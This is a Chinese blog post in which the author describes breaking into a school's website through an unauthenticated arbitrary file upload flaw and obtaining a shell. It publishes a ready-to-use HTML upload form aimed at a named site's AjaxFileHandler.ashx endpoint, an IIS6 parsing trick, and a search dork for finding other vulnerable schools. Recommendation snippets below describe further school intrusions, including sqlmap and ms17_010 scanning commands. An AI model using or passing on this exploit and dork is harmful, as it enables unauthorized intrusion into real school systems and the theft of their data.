学校渗透系统

最新推荐文章于 2024-07-25 10:00:00 发布
最新推荐文章于 2024-07-25 10:00:00 发布
阅读量1.4k 收藏
点赞数
分类专栏: 漏洞公布
今天日站发现了一个 0day 学校的 
 
这是一个任意上传漏洞 不用后台权限 
 
本地搭建上传 成功得到一个shell 
 
这个系统还有编辑器上传不重命名的 可以利用iis6的解析漏洞 
 
服务器是内网的 我没去进一步渗透 
附上exp: 
<form action=" http://www.qiaocui.net/AjaxFileHandler.ashx ?
random=0.20770328072831035&action=upload&root=Uploads&sub=Forum&size=307200" method="post" 
name="upload" enctype="multipart/form-data">
<input type="file" name="ForumEdit:fileUpload">
<input type="submit" value="upload">
</form>关键词:inurl:/info1.aspx?iid= 
请各位不要去搞破坏 日站判十年!!!!! 

记一次对学校网站的渗透记录
袁统的博客
11-14 3498
一、信息收集 首先对网站的信息进行判断,可以很明显的判断出来是dedecms(织梦) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GRcQTfH2-1636897243066)(https://i.loli.net/2020/03/31/Gutibw2A85VC34q.png)] 鉴于织梦的漏洞比较多,我们先对网站的信息进行一下收集,再进行下一步的操作。在这里我们可以判断网站使用了安全狗的防护。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-
8.#技术|对学校实验考试系统的一次渗透 拿到webshell + 查找漏洞
future_M的博客
04-06 2964
学校实验考试系统的一次渗透测试,已经隐藏相关信息并上报学校
关于学校网的渗透与入侵
m0_72703340的博客
02-11 2302
学校漏洞扫描(不进行任何非法用途)
实战|渗透学校某内网服务器
zhangge3663的博客
02-01 5136
”黑“掉自己的学校,可能是大多数黑阔们学生时代共同的执念。 前言: 心血来潮,突然想看看学校有没有能用永恒之蓝打下来的机器,顺便来一波内网渗透,想想上一次测试还是刚爆出永恒之蓝的利用工具的时候,那时候msf都还没整合进去,现在直接就能用msf方便多了。 信息收集: 已知 10.10.10.0/24 为学校各种服务器使用的IP 使用MSF中的批量ms17_010验证模块: msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxili.
某校园内网渗透测试
qq_28624871的博客
05-10 3789
信息收集   一、基础信息 目标系统是windows, 服务层有IIs6.0,Apache-Web-Server, 支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6   二、端口开放情况: 利用goby对ip进行扫描,使用nmap工具也同样能扫出所有开放的端口   三、资产探测: 结合goby和nmap扫描的端口情况,手工探测了下,发现总共有5个web应用,以及开放了MySQL、RDP服务。 端口 应用 运行环境 备注 501 WEB:xxxxxxx网络课
记一次渗透学校网站
qq_54671803的博客
06-01 2146
00x1:掏出我们的狗逼,直接一顿乱扫,别学我,我已经被抓了 (可怕)
渗透测试流程(PTES)思维导图
08-02
该思维导图主要针对信息安全从业者撰写的渗透流程总结而来,其中的部分专业术语的翻译可能存在偏差,希望能够及时指导。部分安全策略及攻击方法都有相对应的解释,如还有部分专业术语需要本人解释的话,请私聊我。该...
网络安全-Windows操作系统渗透测试-中高职业院校(视频教程解析)
12-18
通过本项目竞赛,使中职学生能熟练运用网络信息安全技术 对网络、操作系统、应用、服务器等目标进行信息和数据安全防 护与渗透,具有分析、处理现场安全问题的能力,促进学生团队 ...部署、网络安全运维、系统渗透
渗透实战:如何绕过防护拿下学校大屏幕系统
这篇实战渗透的文章分享了作者如何通过安全检测技术攻破学校大屏幕管理系统的过程。作者首先介绍了自己在网络安全领域的学习经历,强调了五个月来持续学习和实践的安全技能提升。文中提到,对于批量刷站的技巧,关键...
创作的一个简易学校学生教师信息后台管理系统.zip
03-07
在当今信息化时代,信息管理系统的应用已经渗透到各行各业,教育领域也不例外。本项目“简易学校学生教师信息后台管理系统”旨在利用人工智能技术,为学校提供一个高效、便捷的信息管理平台,实现学生、教师数据的...
记一次校园网渗透经历
梦想闹钟
08-13 3093
首先注入点是这里,其实原来右边是没有这个通知公告的,加了以后就加出问题来了,这个其实是一个用于登录校园网wifi的网站 网址http://***/index.php/index/notice/id/1 点进去是一个上网须知 怀疑id/1中 1为注入点,上sqlmap!! sqlmap -u “http://**/index.php/index/notice/id/” --level 3 跑出来发现是一个注入点 然后接下来 --dbs 得到库名后用-D radius --tables看下表,这时候已经
记第一次渗透测试某学校网站
m0_62100902的博客
06-23 5676
因为是黑盒测试,所以很多东西都没法去测试,比如一些rce,ssrf,反序列化等等,都是没办法的,然后这个官网很简单,也没有什么逻辑方面的漏洞可以去尝试的,所以这次测试差不多到这里就结束了,虽然没找到任何漏洞,但是我觉得那个文件上传那里还是有点东西的,并且学到了不少东西,也复习了之前学过的一些东西,这里把一些新学的东西整理一下吧。剩下的就是sql注入,xss注入,csrf,这些是相对容易进行测试的,而ssrf与rce、反序列化,xxe,变量覆盖是不太好找的,如果有源码的话可以根据危险函数去找,
如何破校园网
最新发布
A_991128a的博客
07-25 3942
前端做的不是很好,前端UI布局写的较差,后端接口也不太严谨,能够透露出些信息容易被利用,在找漏洞的过程中发现一个反射型的xss,用处不是很大毕竟要受害者点击才能执行恶意代码,我找到的这些东西和思路都总结在下面。1.前端的错误提示不要给的太明显,可以写成这样 “账号或者密码错误”。2.对账号密码的加密,虽然可以通过JS逆向出来但也可以增加安全性。3.对前端错误次数做限制再加上验证码,虽然可以破解但也可以增加安全性。4.当你拿到账号时登录后请先修改强密码,防止弱口令登录。
渗透实训-从校园网入口到内网大规模失陷
qq_73648490的博客
03-06 952
渗透渗透渗透!还是喵喵的渗透
渗透实战】记一次针对某高校的渗透测试
youmaob的博客
02-28 2045
渗透实战】记一次针对某高校的渗透测试
渗透学校系统
3569
12-01 3872
起因:检查宿舍的人扣我们寝室的的分了,学长告诉我有漏洞的, 那就燃起斗志搞下他    233333 目标网址:xxxxx.action 漏洞:struct2任意命令执行 不要说存在任意命令执行就感觉可以完成一切了,之前我也是这样想的,实际情况告诉我,我想做的事情并做不了 利用过程:     首先是我已经可以执行命令了,但是我想获取它mysql里边存放的网站管理员的账号密码,因为我
渗透校内网——XSS过程详解
6546546546456546
01-22 1428
——余弦函数( http://hi.baidu.com/ycosxhack )三更半夜原创我知道校内网曾经爆发的那个蠕虫,那时候爆发这个相对来说容易,因为那时XSS没任何挑战,而AJAX蠕虫不是谁都可以写出来的,至少要有不错的 JavaScript编程能力。我是这两天才开始认真使用校内网的,使用前就发文声称要XSS^^,没想到几个小时的渗透,发现了校内网的过滤系统就是形同虚设。下面详细讲解下这个渗
我是如何一步一步渗透校园网服务器的
热门推荐
R4bbit
12-20 4万+
(1)信息收集 从校园网登录认证的web服务器入手 认证登录URL: http://10.0.0.2:9090/zportal/loginForWeb?wlanuserip=a7366ddc0f7012124df59542a882d7f2&wlanacname=c26c295bb262381f&ssid=&nasip=3dac9c253b8a73863be917b781d
近源社工-校内网渗透测试
qq_49869351的博客
09-29 1986
“每一个不起舞的日子 都是对生命的辜负” 初出茅庐,文笔和思路都有晦涩,有不足处还希望师傅们斧正,也欢迎萌新成为网安爱好者,一起进步。 一个风和日丽的晚上,去图书馆借书,大准备修身养性,却在登记时看到了学校图书管理系统,啪的一下,很快啊!看到了浏览器标题栏192.168开头内网的地址。一个宏伟的计划便在心中萌芽了起来。 声明!已在校方知情的情况下进行测试,本文仅供学习交流,所有涉及安全方面的主机与程序均已补丁,穿透出公网的地址端口已销毁,如有滥用,与作者无关! 我们学校算是十里八乡比较大的,校园设施也比较
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值